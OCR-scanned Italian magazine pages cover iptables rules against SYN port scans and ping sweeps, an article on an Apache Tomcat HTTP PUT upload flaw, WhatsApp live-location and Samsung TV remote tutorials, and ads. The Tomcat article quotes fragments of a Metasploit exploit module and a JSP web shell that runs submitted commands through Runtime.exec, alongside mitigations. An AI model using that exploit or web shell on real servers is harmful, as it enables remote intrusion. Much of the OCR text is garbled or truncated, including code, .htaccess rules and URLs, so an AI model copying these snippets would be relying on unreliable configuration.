è l’equivalente del comando dmesg (mostra solo i messaggi 
del kernel) mentre la seconda mostra solo le voci più recenti 
e stampa continuamente quelle nuove non appena arrivano da 
iptables (e dal kernel in generale): in questo caso premiamo la 
combinazione Ctrl-C per uscire. 


OCCHIO ALLO SCANNING 


La presenza di un PC connesso a Internet può dar luogo a 
tentativi di intrusione che potrebbero incidere in maniera 
negativa sul fattore sicurezza della rete stessa, affermazione 
ancora più vera se la rete interna dovesse ospitare servizi 
sensibili contenenti informazioni riservate (indirizzi, progetti 
ecc). In questi casi una riuscita intrusione potrebbe dar luogo 
a perdite economiche anche ingenti oltre a violazioni di 
privacy, rivelazione di segreti industriali, ecc. Come ben noto 
in informatica le porte permettono ad un computer, attraverso 
una tecnica di multiplazione, di effettuare più connessioni 
in contemporanea con altre macchine e servizi differenti. 
Nel protocollo TCP, ma vale anche per il protocollo UDP, vi 
sono appositi campi nell’header (si veda ad esempio di nuovo 
l’immagine PacketFiltering.png allegata) che dedicano un 
certo numero di bit al numero di porta sorgente/destinazione, 
di preciso 16 bit e questo vuol dire che il numero di porte totali 
è pari a 2A16=65.536 porte, dalla 0 alla 65.535. La presenza di 
questi campi, unitamente ad altri che specificano l’indirizzo 
IP della macchina sorgente e destinazione, permettono di far 
giungere l’informazione non solo alla macchina che ne ha fatto 
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Fig. 3 * Risultato del TCP Scanning Test 


richiesta, ma anche al servizio a capo del quale c’è un processo 
che ha “materialmente” effettuato la richiesta. Sebbene le porte 
siano indispensabili affinché i sistemi informatici possano 
comunicare tra loro occorre far notare che, analogamente ad 
un appartamento, potrebbero essere utilizzate per operazioni 
illegali (intrusioni) e affinché si verifichi ciò occorre che una o 
più porte vengano assegnate a diversi servizi (processi/server/ 
demoni) in ascolto. Infatti, esiste una specifica tecnica definita 
port scanning attraverso la quale il malintenzionato invia 
una serie di false richieste di connessione che gli permettono 
di rilevare quali macchine risultano attive e raggiungibili 
via Internet e quali servizi sono disponibili sulle macchine 
raggiungibili. Ma come fa il malintenzionato a mettere in 
pratica una operazione di scansione così apparentemente 
complessa? Tramite l’uso di software ad-hoc definiti port 
scanner (o portscan): ne esistono diversi da installare o da 
provare on-line come test per la propria rete. Se vogliamo 
eseguire un prova per la nostra macchina possiamo pensare 
di eseguirne uno dei diversi presenti on-line come Pentest- 
Tools (htips://pentesi-tools.com). Dopo essersi collegati alla 
pagina del sito, sulla sinistra nella colonna Tool Categories 
clicchiamo su Infrastructure Testing per far scorrere il menu 
in esso presente così da optare per TCP Port Scan. 

Nella nuova schermata, di nome TCP Port Scan with Nmap, 
al campo Target riportiamo il nostro indirizzo IP pubblico e 
spuntiamo la casella recante la scritta I am authorized to scan 
this target and I agree the Terms of Service che autorizza 
i proprietari del sito a fare scanning al nostro IP pubblico e 
quindi alla nostra rete. Possiamo lasciare tutti gli altri parametri 
ai valori di default a meno di voler effettuare scansioni per 
specifici servizi. Quando pronti clicchiamo su Start Scan e 
attendiamo la fine della scansione con annesso risultato (Fig. 3) 
dal quale si evince che, senza alcuna protezione, il port scanning 
porterebbe a conoscenza di un malintenzionato che la nostra 
macchina presenta 4 porte aperte: un client SMTP (porta 25) e 
i servizi HTTP, HTTPS e ajp13 (protocollo di Apache Tomcat). 
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Fig. 4 * La macchina di test presentava un livello di rischio 
complessivo medio 


Ma non finisce qui, sui servizi HTTP e HTTPS aperti sulla 
nostra macchina cliccando su Scan with Web Server Scanner 
verranno eseguiti specifici test di penetrazione e forniti i relativi 
risultati (Fig. 4). Altro interessante port scanner on-line è 
HackerTarget (https://hackertarget.com/) che nel servizio free 
al menu Tools fornisce diversi test da poter utilizzare. Come si 
può intuire lo strumento utilizzato da questi servizio on-line è il 
noto software open-source nmap (https://nmap.org). 


LA PAROLA AL FIREWALL 


Quando si configura un firewall si dovrebbe fare in modo che 
il sistema, tra le altre cose, sia immune al tipo di attacchi che 
abbiamo fin qui descritto e quindi, in parole povere, che rilasci il 
minor numero di informazioni possibili. 

Proviamo a riportare almeno una regola che possa limitare, se 
non addirittura fermare, questo tipo di attacchi. Il più banale è il 
TCP connect() noto anche come Vanilla Scanning: non viene 
mai utilizzato poiché facilmente rilevabile in quanto si collega 
alla porta obiettivo e completa a tutti gli effetti le tre fasi della 
connessione (immagine Tcp.png scaricabile dagli allegati). Per 
motivi di spazio non possiamo riportarle tutte, allora analizziamo 
la seconda tecnica, la TCP SYN nota anche con il nome Half 
Open poiché non viene attuata una connessione TCP completa. 
In sostanza viene inviato un pacchetto TCP SYN all’host 
vittima e se questo risponde con un pacchetto di SYN/ACK 
allora vuol dire che l’host per quel servizio è in stato di ascolto 
(LISTENING). Per la nostra prova iniziamo a registrare le 
tentate connessioni sul file di log. scrivendo la regola che segue: 


iptables -A INPUT -p tcp -i ppp0 -s 0/0 --dport 
1:65535 --syn -j LOG --log-level info --log-prefix 
"Connessioni TCP: " 


nella quale, oltre ai già noti parametri di log, è stato indicato 


0000 
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se , i 
68 ®® Linux Magazine 


il totale numero di porte con la sintassi del range dell’opzione 
--dport ovvero la presenza del simbolo “:” ad indicare dalla 
porta 1 alla 65.535. Altro elemento nuovo che appare è --syn 
che definisce la flag del protocollo TCP da controllare: infatti 
una richiesta verso la nostra rete con bit SYN a 1 indica che 
qualcuno vorrebbe iniziare una nuova connessione con la nostra 
rete e questo fa più insospettire soprattutto se non offriamo alcun 
servizio verso l’esterno. Alla regola precedente aggiungiamo 
la seguente che di fatto rigetta le nuove connessioni e che non 
necessita di ulteriori spiegazioni. 


iptables -A INPUT -p tcp -i ppp0 -s 0/0 --dport 
1:65535 --syn -j DROP 


A questo punto, proviamo di nuovo ad eseguire il test on-line 
Pentest-Tools e dovremo avere una risposta negativa, ovvero 
nessun servizio rilevato come aperto mentre la risposta nel 
terminale, messaggi di log, è riportata in Figura 5. Va da se che 
la regola appena scritta protegge contro l’attacco SYN Scanning 
(Half Open) ma non contro le altre tecniche di scanning. Da 
osservare che la stesso accorgimento dovrebbe essere adottato 
per il protocollo UDP sebbene, almeno al livello domestico, è 
abbastanza difficile che un utente offra servizi UDP all’esterno. 


QUEL COMANDO DIAGNOSTICO 


Il controllo del funzionamento della rete in generale e della 
raggiungibilità degli host in particolare, può essere fatta 
utilizzando un programma che utilizzi quel servizio di rete. In 
particolare ricordiamo il comando ping (man ping), il primo 


ATTACCHI A TCP E UDP 
Quali e quanti tipi di attacco? 


IL protocollo TCP è di tipo connection-oriented, servizio 
di rete “affidabile” poiché garantisce che i dati arri- 
veranno nella sequenza corretta e comunque con la 
possibilità di essere ricostruiti a valle, previo nuova 
richiesta, qualora se ne dovesse perdere qualcun. 
Nell'header del protocollo sono presenti alcune flag: 
SYN (richiesta di sincronizzazione), ACK (dichiarazione 
di ricevuta), FIN (termine connessione] e RST (rifiuto di 
connessione). Sfruttando tali flag è possibile effettua- 
re il port scanning secondo varie tecniche che vanno 
dalle basilari alle più avanzate: TCP connect(), Scan TCP 
SYN, Scan TCP FIN, Scan TCP Xmas Tree e TCP Null Scan. Anche 
il protocollo UDP - di tipo connectionless- non è esente 
da tecniche di port scanning come la UDP scan. In que- 
sto caso se la porta UDP è aperta il pacchetto viene 
accettato ma non viene restituito alcun pacchetto di 
risposta. Se invece la porta UDP è chiusa viene ritor- 
nato un pacchetto ICMP con un associato errore, ad 
esempio Destination Unreachable. 
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SRC=218.106.146.195 DST=62.211.196.89 LEN=40 TOS=0x00 PREC=0x00 TTL=239 ID 


tcp dpts:tcpmux:65535 flags:FIN,SYN,RST,ACK/SYN LOG level info prefix 
tcp dpts:tcpmux:65535 flags:FIN,SYN,RST,ACK/SYN 


LEN=44 TOS=9x00 PREC=0x00 TTL=26 ID=62701 PROTO=TCP 
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Fig. 5 e La prima regola di LOG (in basso) registra connessioni esterne (in alto) 


comando diagnostico ad essere utilizzato una volta configurate 
le interfacce di rete. Il suddetto comando una volta lanciato 
verso un’interfaccia invia un pacchetto ICMP di tipo echo 
request. L’Internet Control Message Protocol è un protocollo 
utilizzato a livello Rete per la gestione degli errori e il trasporto 
di informazioni di controllo fra host, stazioni remote e router. 
In questi casi il protocollo di rete prevede che la macchina che 
riceve un pacchetto di questo tipo debba rispondere con l’invio di 
una altro pacchetto ICMP di tipo echo reply che verrà ricevuto 
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Fig. 6 è Schema generale della rete 


dal comando ping e mostrando a schermo il tempo intercorso fra 
l’invio e la risposta. Questo comando, all’apparenza innocuo, 
potrebbe dare origine ad un banale scanning noto come ICMP 
ping-sweeping, una metodologia di scansione che utilizza il 
comando ping per vedere quali sistemi in rete siano raggiungibili. 
Orbene, la regola che abbiamo scritto in precedenza per un 
comune attacco sul protocollo TCP non è idonea a bloccare il 
ping-sweep. Infatti se provassimo a “pingare” la nostra rete da 
un indirizzo esterno con ping IP_pubblico_nostra_rete, la 
nostra rete rispondere senza alcun problema con l’echo-reply 
che verrebbe ricevuto dal malintenzionato. Una possibile regola, 
da aggiungere al secondo posto alla caténa di INPUT potrebbe 
essere la seguente: 


iptables -I INPUT 2 -p icmp -i ppp0 -m state -s 0/0 
--state NEW, INVALID -j DROP 


laddove è stato utilizzato.il modulo (opzione -m) state e definiti 
i due stati riportati per i quali blocchiamo tutti i pacchetti che 
tentano di inizializzare una nuova connessione (NEW) e bloccare 
quelli non associati ad alcuna connessione esistente. 


TIRIAMO LE SOMME 


A questo punto abbiamo molti più elementi per poter realizzare 
un sistema più completo, proprio come quello visibile in Fig. 
6, situazione ideale per una configurazione di rete abbastanza 
standard (più che valida per piccoli uffici e/o istituti scolastici). 
Le regole sono riportate nello script allegato con tutti i commenti 
del caso che aiutano a meglio comprendere il codice. Come al 
solito in caso di problemi è possibile rivolgersi al forum di Linux 
Magazine (http://linux-magazine.edmaster.it/forum)/). 
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Il pericolo viene dal passato 


Apache Tomcat è un servlet JSP in voga alcuni anni fa e tutt'ora attivo su diversi server web. 
Contiene una vulnerabilità che permette a un malintenzionato di eseguire comandi da remoto 


anni ‘90: gli applet Java nelle pagine Web sono una di que- 

ste. All'epoca erano il metodo più diffuso per realizzare pagine 
interattive e ogni utente sapeva di non doversi fidare troppo. Gli ap- 
plet, infatti, erano delle applicazioni lato client: il bytecode Java veni- 
va scaricato ed eseguito sul PC dell’utente, quindi fidarsi di un applet 
malevolo poteva essere molto pericoloso. C'era però anche un’altra 
tecnologia basata su Java e piuttosto diffusa, ma meno nota al grande 
pubblico del Web: i servlet. In questo caso, si utilizzava un linguaggio 
chiamato JSP, una sorta di miscela tra HTML e Java, per creare pagine 
dinamiche. Essendo una tecnologia lato server, gli utenti in genere non 
si accorgevano nemmeno della sua esistenza. | servlet erano un'inte- 
ressante alternativa agli script CGI, considerando che PHP non era 
ancora diffuso, per costruire pagine il cui contenuto potesse cambia- 
re a seconda di varie condizioni scrivendo dei semplici programmi. Il 
vantaggio dei servlet era che non utilizzavano il sistema CGI e non 
richiedevano nessun tipo di compilazione specifica per l'architettura 
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del server che si stava usando: erano più potenti degli script Perl e più 
comode della scrittura di programmi in C++. L'esecuzione del codice 
veniva affidata a una servlet che si occupava non soltanto di imple- 
mentare una macchina virtuale Java, ma anche di gestire tutte le varie 
estensioni che potevano essere facilmente chiamate. Dal punto di vista 
della sicurezza, però, c'è sempre stato il problema fondamentale di 
Java: la macchina virtuale che interpreta il bytecode non è davvero 
separata dal sistema operativo host, quindi è in linea di massima sem- 
pre possibile che un pirata riesca a sfruttarla per eseguire comandi sul 
server sfruttando falle non soltanto nella pagina JSP, ma anche nella 
macchina virtuale Java stessa. 


IL GATTO TOM 


Uno dei servlet più diffusi in assoluto, soprattutto perché abbinato al 
server web Apache, si chiama Tomcat, termine che in lingua inglese 
indica un generico gatto maschio. È anch'esso scritto in Java, così non 
deve a sua volta essere ricompilato per ciascuna architettura e lo si 
può utilizzare su qualsiasi webserver. Si tratta di una tecnologia ormai 
in disuso, ma alcuni server più datati sono tutt'ora dotati di Tomcat. E 
per questo motivo i sui bug non vanno sottovalutati. In particolare bug 
come quello scoperto poche settimane fa, legato alla gestione delle 
richieste HTTP. Ovviamente, quando si visita un sito con pagine JSP il 
rapporto è sempre tra il browser e il server Apache, il quale si occupa 
di gestire le varie richieste HTTP e indirizzarle a Tomcat: è a questo che 
spetterebbe controllare la validità delle richieste. In particolare, delle 
HTTP PUT, che permettono l'upload di byte sul server. Si è invece sco- 
perto che Tomcat permette, tramite una apposita richiesta malevola, 
l'upload proprio di un file .jsp, il quale può poi essere richiesto ad Apa- 
che e dunque eseguito a sua volta da Tomcat. 


L'EXPLOIT 


L’exploit è molto semplice, proprio perché basta realizzare due richie- 
ste HTTP. Seguiamo l'esempio proposto da Metasploit: 


t_alpha(10 
> normalize uri (target uri.path, "#{testurl}. 


jsp/"), 
> 'PUT', 


ad. encoded 


La prima richiesta è HTTP PUT. Secondo il protocollo, verrà creato un 
file nel percorso URI usando i byte DATA come contenuto del file. 


> normalize uri (target uri.path, "# 


{testurl}.jsp"), 
'method' > 'GET' 


}) 


Se la richiesta PUT ha avuto esisto positivo, è poi possibile chiedere 
al server di eseguire la pagina appena uploadata usando la classica 
richiesta GET. Ovviamente, per questa richiesta basta specificare l’URI 
che era stato scelto per il file da creare con HTTP PUT. 


if resl && 
print_status("Payload executed!") 
else 
fail with(Failure::PayloadFailed, "Failed to execute 
the pay 


end 


Quando questa pagina JSP viene eseguita, il server restituisce il codi- 
ce 200, e tutto il contenuto passa alla macchina virtuale Java per esse- 
re interpretato. È quindi possibile ottenere persino un terminale remoto 
sul server. Tomcat non controlla, infatti, il codice della pagina prima di 
eseguirla, quindi anche eventuali accessi al terminale e modifiche a file 
presenti sul server sono possibili. Un esempio di pagina JSP malevola, 
caricabile con questo metodo, può essere: 

«FORM METHOD=GET ='#{testurl}.jsp'> 
<INPUT name= ty xt> 

<INPUT type=sub value='Run'> 
</FORM> 

page import="java.io.*" %> 


o 


String cmd = request.getParameter ("cmd"); 


String output =. ""; 


if (cmd != null) { 


String s = null; 
try { 
Process p = Runtime.getRuntime().exec(cmd,null,null); 


InputSt 


catch(IOException e) {  e.printStackTrace(); 


Si tratta di un semplice modulo HTML con una casella di testo: basta 
scrivere un comando in questa casella e poi la pagina lo esegue sul 
terminale del server usando la funzione exec. 


LA SOLUZIONE 


Il problema è per fortuna poco esteso, perché sono pochi i server 
ancora attivi con Tomcat, ma nel caso ne abbiate uno (e nel caso la 
migrazione a sistemi più moderni come PHP o ASPNET non sia una 
opzione praticabile) è possibile aggiornare Tomcat. La fondazione 
Apache, infatti, ha immediatamente proposto un aggiornamento che 
tampona questa falla. Inoltre, se non le ritenete davvero necessarie, 
potrebbe essere una buona idea disabilitare sul vostro server Apache 
le richieste HTTP PUT e DELETE, così non sarà comunque possibile 
utilizzare il protocollo HTTP per modificare file sul server. Le modifiche 
saranno comunque possibili da parte di applicazioni già presenti sul 
server, quindi i CMS come WordPress potranno funzionare, ma ci sarà 
almeno da parte loro un controllo sulle modifiche che vengono effet- 
tivamente apportate ai file. Le uniche richieste HTTP di cui si abbia 
effettivamente bisogno (nella maggioranza delle applicazioni, bisogna 
sempre verificare) sono GET e POST. Per abilitare soltanto queste si 
può creare nella directory principale del nostro server un file .htaccess: 


Order allow, deny 


Allow from all 


<Limi 


</LimitExcept> 


oppure, per agire a un livello più basso, scrivere all’interno del file 
/etc/apache2/apache2.conf le righe: 


RewriteRule .* [R=405,L] 


per proibire qualsiasi richiesta che non sia GET, POST, o HEAD. 
Development 


Module Options 


Related Vulnerabilities 


II Fig. 2 + Nel database di Metasploit è possibile trovare un exploit che 
restituisce un terminale remoto creando una pagina JSP malevola 
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GON WHATSAPP!” 


Ecco come condividere in tempo reale la propria posizione geografica i contatti 


che messaggiano con te 


na delle funzioni più importanti che si possono trova- 
re nella nota applicazione di messaggistica istantanea, 
WhatsApp, e che si trova praticamente dalla sua nasci- 
ta, è la possibilità di condividere la propria posizione geografica 
con i contatti semplicemente utilizzando il GPS integrato nel no- 
stro smartphone Android (ormai, praticamente tutti i modelli in 
circolazione, dal più economico al più costoso, ne integra uno). 
Funzione che, con il passare degli anni, è rimasta pressoché inal- 
terata ma che con l’ultimo update dell’app è stata praticamente 


rivoluzionata. Sì, perché d’ora in poi sarà possibile condividere 
la posizione con i nostri contatti... in tempo reale! Chiunque potrà 
infatti sapere il luogo esatto dove ci troviamo, in qualsiasi istante. 
I motivi per utilizzarlo possono essere diversi: si può far sapere la 
posizione in tempo reale ai nostri amici per far sì che ci raggiunga- 
no molto più facilmente in un determinato luogo oppure si può at- 
tivare sullo smartphone di un bambino per far stare più tranquilla 
una mamma monitorando in tempo reale la posizione del proprio 
figlio, per sapere in qualsiasi momento dove si trova. 


“Dove ti trovi?” Condividi live la tua posizione 


Ecco come attivare la nuova funzionalità di WhatsApp che ti permette di farti seguire su una 


pes) 


& Invia posizione 


; £ 9, Dud 
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Atina Inferiore 


General Dap © 
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Puoi interrompere la condivisione in qualsiasi orta dell'Ostara 
momento. Per saperne di più. 


ANNULLA 


AVANTI Google 


Condividi posizione attuale 


Questa è la mia posizione! Si 


INIZIA A SEGUIRMI! 
Hi) 1 Dopo aver attivato il GPS del 

nostro device Android, da 
WhatsApp rechiamoci nella chat su cui 
vogliamo condividere la nostra posizione, 
tappiamo sull'icona degli allegati e sele- 
zioniamo la voce Posizione, nella parte 
centrale in basso. 
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POSIZIONE CONDIVISA 
0 2 A questo punto, innanzitut- 

to individuiamo la nostra 
posizione precisa tappando sul pulsante 
in alto a destra. Una volta assicurati che 
WhatsApp l'abbia identificata corretta- 
mente, tappiamo su Condividi posizione 
attuale, dopodiché su Avanti. 


ULTIMO PASSO 
0 3 Nella schermata che appare 
scegliamo uno dei tre periodi 
di tempo in cui saremo in modalità live 
con la posizione, ovvero: 15 minuti, 1 ora 
oppure 8 ore e aggiungiamo, se vogliamo, 
un commento. A questo punto, tappiamo 
sull'icona verde per dare l'OK! 


LA PRIVACY È AL SICURO 


Sicuramente staremo pensando che la nostra privacy oramai sia 
stata completamente violata e dimenticata: ci sbagliamo di gros- 
so! Infatti la condivisione in tempo reale della propria posizione 
verrà attivata solo e soltanto da noi, nel momento in cui decide- 
remo sia più opportuno farlo. Inoltre, sceglieremo sempre noi su 
quale contatto o gruppo si vuole attivare la funzione. 

Una volta attivata la funzione, ci penserà WhatsApp stessa a mo- 
dificare la posizione in base a dove ci si trova, il tutto in un tem- 
po stabilito. Infatti, si può decidere di condividerla scegliendo 
tre diversi tempi: 15 minuti, 1 ora oppure 8 ore, dopodiché la 
posizione smetterà di essere condivisa in tempo reale sui gruppi 
o contatti che abbiamo scelto per farci monitorare. 


COS'ALTRO C'È 
NEL NUOVO WHATSAPP? 


A differenza di prima, ora con il nuovo aggiornamento, 
WhatsApp permette di inviare i file, come documenti di testo, 


fogli di calcolo e PDF. Si può usare questo metodo per inviare 
una o più foto senza compressione, ovvero con la qualità origi- 
nale. Per farlo basterà, da una qualsiasi chat, premere il pulsante 
degli allegati, selezionare poi Documento ed infine cercare la 
foto da inviare, selezionarla e tappare INVIA. 

Attenzione però: per i documenti, il limite massimo è di 100 MB 
ciascuno. Se dobbiamo cancellare una conversazione ma voglia- 
mo salvarla da qualche parte, o se soprattutto sì sta cambiando 
smartphone, basterà andare in Impostazioni/Chat/Backup del- 
le chat ed infine tappare su ESEGUI BACKUP. 

A questo punto attendiamo che le chat vengano salvate su Go- 
ogle Drive utilizzando il nostro account Gmail configurato sul 
nostro smartphone Android. Per cancellare un messaggio dopo 
averlo inviato, basterà tenerlo premuto e selezionare l’icona del 
Cestino, dopodiché tappare sulla voce ELIMINA per cancel- 
larlo dalla propria chat. Ma questa funzionalità ci permette di 
cancellare il messaggio inviato anche nella chat del destinatario. 
Attenzione però: abbiamo solo 7 minuti di tempo per compiere 
l’operazione, un tempo comunque sufficiente per salvarci da un 
messaggio inviato per errore. 


e fallo sapere ai tuoi contatti WhatsApp! 


carta geografica dai contatti che decidi tu 


posizione in tempo 
condivide la tua p 
selezionata anche quando non stai usan 
Puol interrompere la 
momento. Per saperne di più 


«Invia posizione i 


SIAMO IN DIRETTA! 
04 Ora il messaggio apparirà 

così: vedremo la mappa della 
nostra posizione, la scadenza della 
condivisione live e infine ilcommento, 
se precedentemente scritto. Tappando 
sopra questo messaggio sarà possibile 
monitorare la nostra posizione. 


LIVE INTERROTTO 

0 5 Possiamo in qualsiasi mo- 
mento decidere di smettere 

di mostrare ai nostri contatti la nostra 

posizione: per farlo basterà tappare sulla 

scritta in rosso Interrompi condivisione 

edin seguito confermare l'operazione 

selezionando INTERROMPI. 
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IRRINTRACCIABILI 


06 Un altro metodo per inter- 

rompere la condivisione della 
posizione è quello di andare in Imposta- 
zioni/Account/Privacy/Posizione attuale 
e selezionare successivamente la scritta X 
Interrompi condivisione. Infine, tappiamo 
su INTERROMPI per confermare. 
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SMARTPHONE 
O TELECOMANDO? 


Con la giusta app puoi trasformare il tuo telefonino o tablet Android 
in un telecomando per gestire la tua Smart TV. Ecco come fare 


integrante dei nostri salotti. Quasi tutti gli schermi in circola- decine e decine di applicazioni che ci consentono di comandare la TV a 

zione, infatti, sono equipaggiati con una scheda di rete che ci suon di tap. Alcune sono compatibili con i marchi più disparati, altre in- 
consente di navigare sul Web, sfogliare i video di YouTube o fare un vece nascono appositamente per alcuni modelli di TV. Scopriamo come 
salto sui nostri social network preferiti. Ma possiamo sfruttare la con- installare, configurare e utilizzare un’app studiata per le Smart TV di 
nettività di rete del nostro televisore anche per controllarlo dallo smart- Samsung, quelle preferite dagli utenti. 


“Così cambio canale dal telefonino” 


Scarichiamo l’app per gestire la Smart TV di casa Samsung 


| e Smart TV, letteralmente TV “intelligenti”, sono ormai parte phone o dal tablet Android. Già, perché sul Play Store sono disponibili 


Sti Samsun Wifi Remote 
tv remote for x 
Samsung Smart TV e 


SERVE 

UN PIN 

Al termine del 
setup, verifichiamo che il 


o ) SUL PLAY 


i Q1 store 


Verifichiamo che 
Fi nostro smartphone o 


Remote for Samsung 
Smart TV WiFi Remote 


Universal WiFi Remotes tablet Android sia con- device sia connesso alla 
DI Peois | nesso a Internet (tramite stessa rete Wi-Fi della 
Installazione i un hotspot Wi-Fi o la rete nostra TV e che quest'ul- 
. mobile 36/4G] e avvia- tima sia accesa. Avviamo 
dad cotta" | mo il Play Store. Da qui quindi l'app e attendiamo 
Ti potrebbero anche piacere ao | ricerchiamo l’app gratu- qualche secondo. Sulla TV 
Ri ita Remote for Samsung appare un codice PIN di 4 
(3) pos] Smart TV WiFi Remote. cifre. Digitiamolo nell'app e 
aan] | Tappiamo quindi sul pul- confermiamo con un tap su 
di ni e vee sante Installa. Send PIN. 
USIAMO IL —  SamsungWifi Remote : CANALI 
03 reLEcomANDO! LEI PREFERITI 
A connessione Dal menu in Add TV channel 


avvenuta, appare l'inter- Channe CA Program | bassoall'interfaccia, 
faccia grafica principale i  tappiamosulla voce 

dell'app, dalla quale Channels. Scegliamo 
possiamo cambiare cana- quindi + e compiliamo 
le (scegliendo le frecce il primo campo con il Add TV channel 
direzionali presenti in numero del canale e 

Channel) regolare il il secondo con il nome 


506 


Italia 1 HD 


Volume, spegnere la TV che vogliamo assegna- NE See RICA 

o attivare la tastiera re. Terminiamo con 1,2,3.4,5.6,7 8.9.0 
{Keyboard} o il Tou- fiuto Touchpad Me poni Add TV channel. Così qwertyu i op 
chpad. Inoltre, possiamo facendo, possiamo rag- 

rapidamente silenziare il ff01711-11 Pretec Suioo (>) | giungerealcunicanali ajsidifigihfjjki! 
volume con Mute. TV più rapidamente. 4 2 vo elvhinmia 
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« Posta elettronica 
« Hosting tutto incluso 


ORSO 


Dfazt | | 
vai su www.hostek.it HOSTEW$ 


se sei soddisfatto acquistalo subito! HOSTING TECHNOLOGIES 


GENERAL 
Dara 


PROTECTION 
FREGULATION 


COSA 
CI ASPETTA 


II GDPR diventerà obbligatorio. 

Recenti studi evidenziano che solo il 9% 
delle aziende-ha avviato un progetto di 
adeguamento alla normativa. 

Sanzioni previste: fino al 4% del 
fatturato annuale o 2OML€ 

Alcune novità del regolamento Eu: 
l'accountability il privacy impact 
assessment, Il concetto dell'incauto 
affidamento, il danno reputazionale e 
l'obbligo della tenuta di un registro dei 
trattamenti, il diritto all'oblio, la 
portabilità dei dati, la figura del DPO. 


de: 
aconet 


applications communications network 


ACONET COSA PROPONE 
PER RENDERTI COMPLIANT 


Assessment aziendale-> Audit action-> Sicurezza Informatica continuos monitor. 


Valuteremo la tua azienda e consiglieremo le azioni da intraprendere per adempiere 
alla normativa. Attiveremo soluzioni di sicurezza Next Generation per controllare 
+24 eventuali vulnerabilità che possano rendere attaccabile la tua rete (es. 
WannaCry Sanità Inglese). Ci proponiamo come DPO in outsourcing. 


Data Protection Officer - Privacy Consultant e Auditor Certificated 
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